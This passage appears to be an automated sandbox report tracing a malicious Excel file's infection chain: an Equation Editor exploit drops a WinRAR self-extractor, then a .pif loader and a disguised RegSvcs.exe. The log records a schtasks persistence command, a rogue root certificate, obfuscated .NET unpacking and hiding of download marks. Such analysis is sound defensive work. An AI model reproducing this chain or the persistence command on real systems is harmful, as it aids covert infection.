Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp7677.tmp'
Source: unknown	Process created: C:\Windows\System32\taskeng.exe taskeng.exe {65A54373-42CF-48A1-B53D-BB3CC40C1C58} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0
Source: unknown	Process created: C:\Users\user\33920049\mmuiqlcvwo.pif 'C:\Users\user\33920049\MMUIQL~1.PIF' C:\Users\user\33920049\fmkkelc.omp
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\user\33920049\mmuiqlcvwo.pif 'C:\Users\user\33920049\mmuiqlcvwo.pif' fmkkelc.omp	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp7677.tmp'	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe 0	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FE33A3 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,		5_2_00FE33A3
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_01014AEB OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle,		5_2_01014AEB

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRD47D.tmp

Jump to behavior

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_0101E0F6 CoInitialize,CoCreateInstance,CoUninitialize,

5_2_0101E0F6

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_0100D766 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

5_2_0100D766

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll	Jump to behavior

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FE3EC5 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,__wcsicoll,CloseHandle,

5_2_00FE3EC5

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\{c213d282-998c-4a04-8f80-944681ca75f6}

Source: C:\Users\Public\vbc.exe	Command line argument: ps*	4_2_0027CBB8
Source: C:\Users\Public\vbc.exe	Command line argument: sfxname	4_2_0027CBB8
Source: C:\Users\Public\vbc.exe	Command line argument: sfxstime	4_2_0027CBB8
Source: C:\Users\Public\vbc.exe	Command line argument: STARTDLG	4_2_0027CBB8

Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: vbc.exe, 00000004.00000000.447066106.0000000000292000.00000002.00020000.sdmp, vbc.exe.2.dr
Source:	Binary string: C:\Windows\RegSvcs.pdbpdbvcs.pdbegSvcs.pdb source: RegSvcs.exe, 00000006.00000002.666190763.000000000083D000.00000004.00000020.sdmp
Source:	Binary string: RegSvcs.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000D.00000002.536198075.0000000000DA2000.00000020.00020000.sdmp, RegSvcs.exe.5.dr

Data Obfuscation:

.NET source code contains potential unpacker

Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027E336 push ecx; ret	4_2_0027E349
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0027D870 push eax; ret	4_2_0027D88E
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FC6BD5 push ecx; ret	5_2_00FC6BE8

Contains functionality to dynamically determine API calls

Source: C:\Users\user\33920049\mmuiqlcvwo.pif

Code function: 5_2_00FBEE30 LoadLibraryA,GetProcAddress,

5_2_00FBEE30

File is packed with WinRar

Source: C:\Users\Public\vbc.exe

File created: C:\Users\user\33920049\__tmp_rar_sfx_access_check_4531298

Jump to behavior

Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 6.2.RegSvcs.exe.340000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'

Persistence and Installation Behavior:

Drops PE files with a suspicious file extension

Source: C:\Users\Public\vbc.exe

File created: C:\Users\user\33920049\mmuiqlcvwo.pif

Jump to dropped file

Drops PE files

Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\33920049\mmuiqlcvwo.pif	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	File created: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\asdERTYgh56F[1].exe	Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

Process created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp7677.tmp'

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe

File opened: C:\Users\user\AppData\Local\Temp\RegSvcs.exe:Zone.Identifier read attributes | delete

Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_00FE43FF GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,		5_2_00FE43FF
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Code function: 5_2_0102A2EA IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		5_2_0102A2EA

Stores large binary data to the registry

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\taskeng.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\33920049\mmuiqlcvwo.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
